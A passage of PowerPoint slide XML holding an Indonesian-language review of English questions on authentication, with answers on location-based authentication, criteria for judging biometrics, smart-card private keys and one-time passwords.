              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "something you know", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. What methods can be used to implement location-based authentication?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>IP address filtering/geolocation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>GPS data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mobile)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Wi-Fi triangulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Cellular tower location</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Bluetooth beacons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (geofencing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (context-aware authentication).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>6. Apart from cost, what would you consider to be the major considerations for evaluating a biometric recognition technology?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Accuracy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> False acceptance rate (FAR) dan false rejection rate (FRR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Speed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>User acceptability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Scalability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Security &amp; spoof resistance:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Sulit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipalsukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Privacy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>regulasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kenyamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang bocor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di-reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>7. True or false? When implementing smart card login, the user’s private key is stored on the smart card.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>True.</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dirty="0"/>
              <a:t>Smart card </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>private key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Private key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> smart card, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekstra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>8. How does OTP protect against password compromise?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>OTP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>One-Time Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
